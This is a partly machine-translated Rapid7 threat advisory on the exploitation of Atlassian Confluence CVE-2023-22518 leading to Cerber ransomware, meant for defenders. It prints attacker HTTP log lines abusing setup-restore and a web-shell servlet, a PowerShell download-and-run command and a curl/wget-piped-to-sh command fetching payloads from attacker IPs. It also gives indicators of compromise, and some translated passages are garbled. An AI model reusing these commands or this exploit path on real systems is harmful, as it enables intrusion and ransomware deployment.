rapid7观察到Atlassian Confluence CVE-2023-22518的利用

Last updated at Fri, 10 Nov 2023 19:23:07 GMT

Daniel Lydon和Conor Quinn为本博客提供了攻击者行为的见解.

As of November 5, 2023, Rapid7管理检测和响应(MDR)正在观察Atlassian Confluence在多个客户环境中的利用情况, including for ransomware deployment. 我们已经确认，至少有一些漏洞是有针对性的 CVE-2023-22518，存在影响Confluence Data Center和Confluence Server的不正当授权漏洞. Atlassian于2023年10月31日发布了针对该漏洞的公告. MDR has also observed attempts to exploit CVE-2023-2251510月4日，Confluence出现了一个严重的访问控制漏洞.

Atlassian updated their advisory for CVE-2023-22518 11月3日，他们注意到有客户向他们报告了利用该漏洞的情况.

Observed attacker behavior

Beginning November 5, 2023, Rapid7 MDR开始响应在各种客户环境中对Confluence Server的利用. 我们观察到的警报发生在2023-11-05 10:08:34和23:05:35 UTC之间.

The process execution chain, for the most part, is consistent across multiple environments, 这表明可能会大规模利用易受攻击的Atlassian Confluence服务器.

Rapid7 observed POST requests in HTTP access logs (/atlassian/confluence/logs) on both Windows and Linux. The requests were sent to /json/setup-restore.action?synchronous=true, as seen in the example below:

[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/ 23:11:56:09 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 404 3ms 40 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:11 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0 /任务/ 1 f5049f1 - 6 fd7 - 471 d - 937 c - 7 afbe3158019 HTTP / 1.1 200 4ms 229 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0 /任务/ 1 f5049f1 - 6 fd7 - 471 d - 937 c - 7 afbe3158019 HTTP / 1.1 200 3ms 274 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 27ms 212 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 14ms 556 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:18 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36

作为利用的一部分，Rapid7管理的服务在主机系统上观察到以下进程:

• Linux

Parent process:

/opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=XXXX -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.无头= true -Xloggc: / opt / atlassian / /日志/ gc-YYYY-MM-DD_XX-XX-XX汇合.. log -XX:+ usegclogfileroation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc- yyyy - mm - dd_xx -XX-XX -XX . log: + usegclogfileroation.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m - ignore.endorsed.目录= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start

Child process:

/usr/bin/bash -c whoami
Additional Commands (decoded and deobfuscated):
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru

• Windows

Parent process:

"DRIVE:\Confluence\Confluence\bin\tomcat9.exe" "//RS//Confluence"

Child processes:

cmd /c whoami 

Additional Commands (decoded and deobfuscated):
IEX((New-Object Net.WebClient).DownloadString("hxxp[:]//193[.]176[.]179[.]41/tmp.37")) 

Post-exploitation behavior

After the initial enumeration activity (whoami command spawned via Bash), 攻击者执行Base64命令，通过python2或python3生成后续命令.

/usr/bin/bash -c whoami
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
uname -p 2> /dev/null (spawned by /usr/bin/python3.6)
/usr/bin/id -u (spawned by /usr/bin/python3.6)
/bin/chmod +x ./qnetd (spawned by /usr/bin/python3.6)
/bin/chmod 755 ./qnetd (spawned by /usr/bin/python3.6)
/tmp/qnetd (ransomware execution)

—-----------------------------------------
/usr/bin/bash -c whoami
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
curl -s hxxp://193.43.72[.]11/mdrg.sh || wget -q -O- hxxp://193.43.72[.]11/mdrg[.]sh)%7Csh 
/usr/bin/cat /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/uname -m (spawned by /usr/bin/bash)
/usr/bin/rm -rf /tmp/lru(由/usr/bin/bash生成)
/usr/bin/rm -rf sh (spawned by /usr/bin/bash)
/usr/bin/id -u (spawned by /usr/bin/bash) 
/usr/bin/rm -rf ./qnetd(spawned by /usr/bin/bash)
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/bash)
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/uname -p (spawned by /usr/bin/python2.7)
/usr/bin/id -u (spawned by /usr/bin/python2.7) 
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/python2.7)
/tmp/qnetd (ransomware execution)

In multiple attack chains, Rapid7观察到利用后的命令执行，以下载托管在 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, 导致在被利用的Confluence服务器上部署了单系统Cerber勒索软件.

Mitigation guidance

所有版本的Confluence Server和Confluence Data Center都存在CVE-2023-22518漏洞. 该漏洞已在以下固定版本中修复:

• 7.19.16
• 8.3.4
• 8.4.4
• 8.5.3
• 8.6.1

Atlassian Cloud用户不受此漏洞影响. 如果您的Confluence站点是通过atlassian访问的.. net域名，它由Atlassian托管，不容易受到此问题的影响.

Customers should 紧急情况下更新到固定版本的Confluence，限制外部对应用程序的访问，至少在他们能够修复之前. 如果无法限制对应用程序的访问或在紧急情况下进行更新， Atlassian’s advisory 包括您可以采取的临时措施，以减轻来自已知攻击向量的风险. As always, Rapid7强烈建议应用供应商提供的补丁，而不是仅仅依赖于临时缓解.

Indicators of compromise

IP addresses:

• 193.176.179[.]41
• 193.43.72[.]11
• 45.145.6[.]112

Domains:
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad [.]onion

File hashes:

• Bat file: /tmp/agttydcb.bat - MD5: 81b760d4057c7c704f18c3f6b3e6b2c4

• ELF ransomware binary: /tmp/qnetd - SHA256: 4ed46b98d047f5ed26553c6f4fded7209933ca9632b998d265870e3557a5cdfe

Ransom note: read-me3.txt

MITRE ATT&CK Enterprise Techniques

Resource Development:
Acquire Infrastructure (T1583)
Develop Capabilities (T1587)
Obtain Capabilities (T1588)
Stage Capabilities (T1608)

Initial Access:
Exploit Public-Facing Application (T1190)

Execution:
Command and Scripting Interpreter (T1059)

Defense Evasion:
File Directory & Permissions Modification (T1222)
Indicator Removal (T1070)

Impact:
Data Encrypted for Impact (T1486)

Rapid7 customers

从11月1日起，InsightVM和expose客户可以使用未经身份验证的检查来评估他们对CVE-2023-22518的暴露程度, 2023 content release.

通过Rapid7扩展的检测规则库，insighttidr和Managed Detection and Response客户已经拥有了现有的检测覆盖范围. Rapid7建议在所有适用的主机上安装Insight Agent，以确保对可疑进程的可见性和适当的检测覆盖率. 部署了以下检测规则，并对与Atlassian Confluence利用相关的活动发出警报:

• 可疑进程-汇流Java应用程序启动进程
• Webshell - Commands Launched by Webserver